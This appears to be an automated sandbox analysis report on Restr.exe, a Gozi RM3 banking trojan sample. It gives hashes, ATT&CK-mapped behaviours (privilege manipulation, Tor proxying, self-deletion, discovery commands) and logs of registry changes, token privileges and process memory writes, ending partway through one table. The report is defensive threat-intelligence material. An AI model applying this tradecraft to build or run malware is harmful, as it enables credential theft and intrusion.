gozi_rm3 | 0f4395c5cdee1c9fe28ef9a63355594f0f7a23aa41e52b8085a0bda8715da13f

Resubmissions

15/03/2022, 08:05

220315-jy3feaahdk 10

15/03/2022, 07:24

220315-h8lpzaghf8 10

Analysis

max time kernel
813s
max time network
1783s
platform
windows7_x64
resource
win7-20220310-en
submitted
15/03/2022, 08:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Restr.exe
Size

252KB
MD5

16959900ff34c0ba60fe2a4d9f1242c5
SHA1

888148f1b31355192e26ea4fc97c91f4c4defe9e
SHA256

0f4395c5cdee1c9fe28ef9a63355594f0f7a23aa41e52b8085a0bda8715da13f
SHA512

a2b7a74fdc6525c5b8ecafc66706136e1e3996e28ebb3b1d8e236b120e59f8c4e85165f385365d706a8391ae2a5f30530a086c7820e26d1a6cd2f19a44da5d54

Score

10^/10

gozi_rm3 banker trojan

Malware Config

Extracted

Family

gozi_rm3

Attributes

build
300994

Signatures

Gozi RM3
A heavily modified version of Gozi using RM3 loader.
banker trojan gozi_rm3
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Deletes itself 1 IoCs

pid	Process
1960	cmd.exe

Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.

Connection Proxy
T1090

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1752	timeout.exe

Discovers systems in the same network 1 TTPs 1 IoCs

discovery

Remote System Discovery

T1018

pid	Process
1784	net.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
1496	tasklist.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1992	systeminfo.exe

Modifies Internet Explorer settings 1 TTPs 50 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e50000000002000000000010660000000100002000000013e729f8d0199c8b3388f72cba6981afef89518eab826b0acbcf49f9412abd3d000000000e8000000002000020000000b8b519f84316240c3aa3b4dbdb48ded4d09ff3d39ed2f5e88d399a57d9c15e1b30010000d75e904ae2708e45fd91cf35d49ea228fd21d8b16add4ec2139710fe65e7a8513a70dd76dbb9fd2a8ec199fab6c01f699579625d422ca909d49a8129b10a76b96dbeacd1b78c70e1d5032b3c382754b5a39f26dd3646e486dd07daa049d655bce728f947bd1bf2854b273bf232be84981d8c84ee8cccc37b3566fb93a2230bf33a837c052f89f259d0714e48c113f796fa8987324b35331aa1a5740b87b47f2a692f6adb68022c3d6e289ee06702749224aa42b9ad39c69775648f1d86a08cb445643eb3f576af34663ff22fb6d911638b8cf929a7e45270bc8dad889660926f449a4addf2bf25453d6b096e42a098ca13ceaf97ec544394f504f5a27a5cfce2623e2f7ac77c8e83fca142fe0b34cd437d127786e3aa824be37b5ad2384f55b530aefbe6ad6ce60d651a05b3338ea7ac40000000ce48cca7560ca41ddb53aef8cd19865c17ff282f491c1ea61d1a6027f0ac9c6442ee5a30e8aee47f269fb288c78cadb9a62eeb8642fa0fc8b921eebd007219b1	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000001253851e9c72fbbe26a60558a052caefc4be7f0b92c10d76852aa1a667d30ade000000000e80000000020000200000009f5faac493dd9e81ae8424f27edb184bf46ffd484adefe22c7ca1a5289f255ce300100006ebf813f74442d1aa7235a6d1c89baec15b851ede5e64ca295567c2d94d341b782bfc9c57b7542108f13ef522e0b1864116cd6908789d15893d8422b13a586603c02114a5652059d7ddabceebea2971e03dcce8c4c0215680c37afe7bfc1b9a21efcdd9581859a1f198d9ddb3567a88b3f78ebad11cee2a648d564edbc40849621c0e36f683ad4d11309e55e2903807e5bbcdb8293737f9df35b6a334902ab35ea0cd297f0bec821da5130ba4d92f9e45e0ee5d67744fe0aa2f7e2be61323cf02023978bd858bcfe7b4e7751cf191cdbe3b2140b3814de7b4a8712e55478f569b108913ce2410348b8f1528c04248ab2331ef22d4e2f36e7da2babcd03bf799f9249c6a03980e46bd3dc2286d75305d017c266050da68668d97b013e9820d084da11d4a6e0c6654eaa1efaa3484a6b16400000001d9618d6d327e40799885ed9fba9f6bc2c5009edb5b36980b9c87e5b6ee241f32346911de923bb0cfd039488233a4627e6f43c4f5f617d7b12649b70c532e07c	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000000d1b8db92c8f7900356eaa87fa6ce42aa247aa119a4e55e3b00db422410a6442000000000e8000000002000020000000234346cc27fd74d2f996a365f28c9b36e7511d00a483c44a2187f6bc7adc54dc3001000053318a171a143268d2da4fbe28b0460a6d7977fd287c80334f275fc07a80b081da06f44ae4c360dbb00fd5ac771bd243195a63efdb96a654eabc854b77733c8ffcdf896e763138b4ebc220db1859e521f5817df34d6730dbd6b05825e841f861390c10d5e75c6380edc1b80db2ccbc200085a5ae0298bf5b4a0b9f746df7c6e7625553c4a74fb3cd9235bd47e3830abce883cca1a623628fb9c28efa7cd884300a3d35ba3e84be706c93f1bddd58a94b4c300e5650325b9a4c45f9fd35e960f40246c0c0d86bea56a1252eacf59a541695103270caa26a5d594d613eda940d9ea9d1c31259df9e37fb3d9f5500be7ffeedd0c10f077ef9d31e67d3bac7aa18e1e1b9af2e218965f78587cf8d89bf7fb84f4a567bc992182d5844e2a2ac4957b8a3d68704038a81ecd6d3c0835b8643c5400000006c6dd99d64a76f589eec6088af9785e884210325a2c0acb6c91560e6c46a192274a5ae86b91e7ab7148fb10beeda53a4d19c0de42efb087c04444bf5e5d41d21	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000002c99b8e9ab77a25760a4b815ae5181bffde539ff42718f672b1b9f331e2df6d5000000000e8000000002000020000000e4aba0743beb4cf6e0fb7a36e06b785ce584fa692571faec8a0be10ec1ee1ed030010000009b85ed8ecf0a9d15e320e68b8f1494dd30f3a37d160fa4326a44084e328eed3761b12d2471bbd750c1aa8c657c9b81daa0077d131bccacd3e54f03b460f85b018a3d55b04ebd9ab56be7a5835b4cdd25a408bed35e063ff058a62f3c2c3d0790ce39bc868692c2147a59cc979e69609371d639aa8af3ea0f310ae4f6d1fdd2d7bf6cc30e3375f170df9ff974a5e903418ce37ac83b0399f6fb54f7542c52966eec68369aa9653f1ce8ab3d0e172a26b1296dd22052c2fe4be27c77b3e11a5b21e03dbeaa417f9436e2561e9e3cc3029a2f062e7b90dfc3a21c3fda116b53f6ee83e46faee03f379fa1bfb8b7ca2c2deea57b9c7d47d5e97c46725c7e08b880e98a7ad15683e27bcc3b03424be2c7f3b934661025fcbd236c7e28c9cc195666678b10ea01d7688be411ea70c8eee7f240000000c6236490c2ea1fde269e600d15cdf6b81b307722a6a9cc7e6d066af18092335789613ec9681a21b2a93905457821ff886211b4a0c5e80f8aa40e2f42725d2fbd	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000beeec9d2deb8f069bada8067d9001c993578286c6e26a40b2caf081991ec7f13000000000e80000000020000200000009f513064928681f4d307c5083b82ad1b6fd4cb4dae08c23c66e129f8cb6545363001000012213090d33a3624b003cb3b1067553475d4fa62a29601edf3b66f2a16fa331e4d73e080dbd9a0c27c25c1d8318f26f88b269b651e53f901d3003ba3f92d990907440912b2ef3337f744055e5ac283ed16e1f8b470cbf04908eefc3894b4a93a260c825d704b56d9320b784c178930c760157e580fbeee88c993c502c40f0adf265fb99bce6ce16749e095bf31ffe12fc6f80afd71890f12c0a1a4b1e589589a6e038efbdd073a2ea82fc8ece2fe6abe5c1fd4382800f9b654edd0e0209c56f960f7f558c1b8dc44f50015bad9770730da9ff78cb50a32c4d5974703636dcd919106e7c0a35a734786d9c67f82fc990b7feebb12e00395cfa3e2e081f85f52cb4cd665a4b39937e2fe6eff82d26e5d9c56068e504358c0bcb54cbdab30bae07b0e561bbf2aadcfe5c0d792c8c9488f3540000000ea5e272b49bbae76942382a26b7dc43e6e462f85ab391c376e783bd31f16d1bdda26c2ab53f1cb161d077d40555989c681a040d71a8bfd74103d0fbf47b757f9	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000005e39a2f2120417b65ac9106ceed3a24fc0d408ea270bf396be320bddbc398919000000000e80000000020000200000004398fd14b62f40f6ef9fb89b20ab961e0ca3922faaeb2ea7597cd399b1cdaef7900000006547d28725f1586abe057ca4e00523c53e52bb683cf0ca1aa72108465f5fd4f63689b64372ae46ff57644ab1a7d17111d62702b29ed3229002859d49ccc35fefc1fe45e7ea94001015683ec0b4f6cc67a98b184bd85264dbc265e461ffbf815ac35bc8fa94f01534b5fa540543a8370ec6318bd1549abca2bb9f94e3da86b3aa36bd23ee7b37ced3de2a653e13d48ac2400000001755f77689db2a92a58dd53eb4014329acf5f8577d77e89d36da655e5dd679cc4ce6e95212ac172b6962dea94730c56c3a5e69fd7e62ce06d67633fe271ac64c	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000000327417904ce8ccc1fbac4b6b9207c038487f464f9180dbab3015b4354d33bd0000000000e8000000002000020000000f424f0ea33e3bda01dc30ff48ca2ec16bd21da14d92d2112eb6074e3229f42333001000096fc8b3705b019b9a45782ce1440f77e5dea913a0ad36067ee5e6f54c812cb9018b86d3d74348203c657829d73b0ea949f1269dbe83927742645158d6bd39e8a01a2d55e7658101d8a73b2f04a4fe61a05bb838431ffdcb5af0e166143195bc6c6a9cc8e8525ed3c4f998f4a2dcfcab0196d536f9143d9d7b0ddc0cc9212ce98eade30bc49e1cd3abc488cdafeda7ead060582805db8d90beb4b43013005cb6d36ef2c6609080c969211468566beb08385758a13d7b534f21943402058b28a9ba68389b41f74e7ba82d79c460795206eec08c05337796803019c1643e9884585170ff87161753c1f446a775da5df1efc7999c277b1a81d43acf259ca4c91b02559b02a66fa60c821e23186536fecd8593589beff513995d79a282e2dfef9396e9b169a51321262184ad1a04a482907ba40000000159aaa54b4cb8adac1a981734c04efd67ac63d949f3178823b6f7b9938cd02488ffa22ad9516af632fcbd45d415be1f652921d006f18f925e741b004f3fa0b02	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000000f0c90ca8aa362f4bb280a1f912dbbfc48724fe4bb9f822285a29424f43883b6000000000e800000000200002000000019a530c4d2946803d68366d41cc65d926fde8a169bd8c6ed593681e5567185ca30010000c9374231d73f151ae93fbb1bc59d1f98100eb574af797b489ad7e8654d7ee54b2ef82bfe6a78bc228d298a0a5d61eca2f413f0e0f961d04e67495e54f29bfa8e7834ba4e1e29e31efbc784c55735ee8fb1a9f2c1557121720a3a707418f16a909cc3db2b77da90f15ee4c9ee22968c238e1ed08e2c5caf63ab002c00231ee074bc168b956bbfe29bd0052b467a47ac0cf2fb9af8a9fe7b7a861c8c308b49f6808a8e0e5d96adc8dacf7d81dd76437eb594a7c628fdd0b1e1bf27a04f36156305af876ea75b123b3619c0964da9cb408bafe87ee7d99ddc1a4ce5134ac7c2339f4feac9d8c19c640b48c888deba4220ef4646dccd99135c009012d94db1d7e4cf1f66527c2575f43c5cc865e28c3f4a52c3c837e87bb39dbafb9c83e42e9a50a0b950c7813704889c2bae7b66169302c540000000391b625ece0706cc04c52e04f62fca5c43f9c1eff0411754d7840a3821cd1e84cdb7fe2f96d6195e381db196cf562262fc96cdc03433ae7ca19360a218b7c49f	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000aba5a280f62324e21f7f014358dc7dc828ddc09c3f1209c6f292816716ad489d000000000e80000000020000200000005d3c957ae64c72dcdf974d8aab995bffa2d460e23d100038593cb637480f6aad200000002f31e5f4f1311847e5ffac143389ddbc70ba92904edbbb62588dc8a1be0d1e2840000000432722c5302fad0f3b00bc4947b6008f48fef9c7eab09ba0679698e4965ab81cb6ae14b00fefa2e9854de89198a0e65bc4d0909cd6e6f479a62a00a1419e9229	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 40e6dbe04b38d801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000140a62193c077483292e4f6d9df2a0177eb679dadc9e0bb37c84ac51a3f5494f000000000e80000000020000200000004f2ea5f9daa1daa926b61a42f0f53ffa1df2c1d8622ece9fc6fbf3d4e2ec322230010000b94dc60e7ebc267dc91e1362f6bcf4388c2c870af1ddd1018c86a7c822866c62081143ccf1604650ae9e404ceb4a027f25c5c48f34dc36b19bddf0882b8e8d1d49a12fa83366b8267be50ad1eba781f73f7e084bba7cd11859d16de3a49907b2378a0d696b7c3769e24184c700c649601998c53d2ccaa8cd3ff2ffcf9ade9396a9611eff189d8ad0a20116f164ff0940159c8bcbe8bc3bbd2851ed52c8b8acff7b6e44cd683d0f96e84b086d3432bea1e668c6a83946269b07afd645ac621644689f12e09d1dc35890f6843b576be7b24d1293b274a857f3e3b6f6d4f440c27f967846be2e7b88391e4f9ea0db8e636a187dfad5652475a050593facd189bfb4dd5171fed4e38925b869d16e66560f2243ad90c32edc84fb64484c84a34140409625d0e2fd6bf94545d277c49ef89fc7400000002d5a52d1000e5e2acb15a94b9cdb455034a15db0cfea7f109b91eb32a78a9f4a55abd17016ee42870400a14bddab5927f79f4f9e59d96caae0edf68bd80afe1f	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3200000032000000b804000097020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000add77028ae60a5f74186fe22959bfba532792f8ded1cda1f1a59241ff76346e1000000000e80000000020000200000009f7396147e2cd775626a8c1d6fd4ca0ea1752e716d6c72e5b6ab13e151ec4461300100001d4e4649784e956f90c6e4b37578ffde573a7e511f034748dc6e998f4bd73f52347a29eae71d93d6580ae567566e129d121034aba720fe2ea78ee30b259cf208282876e323e4ede5a7d5fb0901cfa368314c04743337bf720cbb1c2103c31dd451204c68aa59fe7c8f8dcb2ea6a59be10c8c025a38ebdb90479f92a212bd001682f47ea63fd1ce8ac830de3cdb61377371a04e97aeb4caf6a99d6e098af6c77ad89f24240c0e90ca53527c7a17a3cf04bbafe4a941fae129f9d282f78185302cca8e492efb5a66e7f2b018b8d9c2277bada8139a06c5b5f879e1a82b05620115664804cd489d129f6133c1b0384b095132a9fc3563dba565386145c144bd175303bdb3743b5fe7fb50e22ced5bccc6a616674e4875154fea273c391a3822e49be06f6f1030d9b0008de64bd28311b26c400000009001a73704a71160e44c15b19a492f8f3fe591b79a9748d3fbb08183ab5538b9da8fc7c56bff904469861f061501e81b52dda8badfb63f04f6a3da3cdabc54dd	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{17D90BF1-A43F-11EC-A594-F6E36C9641D9} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE

Runs net.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1292	powershell.exe
1640	powershell.exe
844	powershell.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
1292	powershell.exe
304	Restr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1292	powershell.exe
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeDebugPrivilege	844	powershell.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1200	whoami.exe
Token: SeDebugPrivilege	1496	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1380	WMIC.exe
Token: SeSecurityPrivilege	1380	WMIC.exe
Token: SeTakeOwnershipPrivilege	1380	WMIC.exe
Token: SeLoadDriverPrivilege	1380	WMIC.exe
Token: SeSystemProfilePrivilege	1380	WMIC.exe
Token: SeSystemtimePrivilege	1380	WMIC.exe
Token: SeProfSingleProcessPrivilege	1380	WMIC.exe
Token: SeIncBasePriorityPrivilege	1380	WMIC.exe
Token: SeCreatePagefilePrivilege	1380	WMIC.exe
Token: SeBackupPrivilege	1380	WMIC.exe
Token: SeRestorePrivilege	1380	WMIC.exe
Token: SeShutdownPrivilege	1380	WMIC.exe
Token: SeDebugPrivilege	1380	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1380	WMIC.exe
Token: SeRemoteShutdownPrivilege	1380	WMIC.exe
Token: SeUndockPrivilege	1380	WMIC.exe
Token: SeManageVolumePrivilege	1380	WMIC.exe
Token: 33	1380	WMIC.exe
Token: 34	1380	WMIC.exe
Token: 35	1380	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1380	WMIC.exe
Token: SeSecurityPrivilege	1380	WMIC.exe
Token: SeTakeOwnershipPrivilege	1380	WMIC.exe
Token: SeLoadDriverPrivilege	1380	WMIC.exe
Token: SeSystemProfilePrivilege	1380	WMIC.exe
Token: SeSystemtimePrivilege	1380	WMIC.exe
Token: SeProfSingleProcessPrivilege	1380	WMIC.exe
Token: SeIncBasePriorityPrivilege	1380	WMIC.exe
Token: SeCreatePagefilePrivilege	1380	WMIC.exe
Token: SeBackupPrivilege	1380	WMIC.exe
Token: SeRestorePrivilege	1380	WMIC.exe
Token: SeShutdownPrivilege	1380	WMIC.exe
Token: SeDebugPrivilege	1380	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1380	WMIC.exe
Token: SeRemoteShutdownPrivilege	1380	WMIC.exe
Token: SeUndockPrivilege	1380	WMIC.exe
Token: SeManageVolumePrivilege	1380	WMIC.exe

Suspicious use of FindShellTrayWindow 11 IoCs

pid	Process
2020	iexplore.exe
2020	iexplore.exe
2020	iexplore.exe
2020	iexplore.exe
2020	iexplore.exe
2020	iexplore.exe
2020	iexplore.exe
2020	iexplore.exe
2020	iexplore.exe
2020	iexplore.exe
2020	iexplore.exe

Suspicious use of SetWindowsHookEx 44 IoCs

pid	Process
2020	iexplore.exe
2020	iexplore.exe
1840	IEXPLORE.EXE
1840	IEXPLORE.EXE
2020	iexplore.exe
2020	iexplore.exe
1080	IEXPLORE.EXE
1080	IEXPLORE.EXE
2020	iexplore.exe
2020	iexplore.exe
1840	IEXPLORE.EXE
1840	IEXPLORE.EXE
2020	iexplore.exe
2020	iexplore.exe
1840	IEXPLORE.EXE
1840	IEXPLORE.EXE
2020	iexplore.exe
2020	iexplore.exe
1840	IEXPLORE.EXE
1840	IEXPLORE.EXE
2020	iexplore.exe
2020	iexplore.exe
1840	IEXPLORE.EXE
1840	IEXPLORE.EXE
2020	iexplore.exe
2020	iexplore.exe
1840	IEXPLORE.EXE
1840	IEXPLORE.EXE
2020	iexplore.exe
2020	iexplore.exe
1840	IEXPLORE.EXE
1840	IEXPLORE.EXE
2020	iexplore.exe
2020	iexplore.exe
1840	IEXPLORE.EXE
1840	IEXPLORE.EXE
2020	iexplore.exe
2020	iexplore.exe
1840	IEXPLORE.EXE
1840	IEXPLORE.EXE
2020	iexplore.exe
2020	iexplore.exe
1840	IEXPLORE.EXE
1840	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2020 wrote to memory of 1840	2020	iexplore.exe	32
PID 2020 wrote to memory of 1840	2020	iexplore.exe	32
PID 2020 wrote to memory of 1840	2020	iexplore.exe	32
PID 2020 wrote to memory of 1840	2020	iexplore.exe	32
PID 2020 wrote to memory of 1080	2020	iexplore.exe	34
PID 2020 wrote to memory of 1080	2020	iexplore.exe	34
PID 2020 wrote to memory of 1080	2020	iexplore.exe	34
PID 2020 wrote to memory of 1080	2020	iexplore.exe	34
PID 1948 wrote to memory of 1012	1948	cmd.exe	37
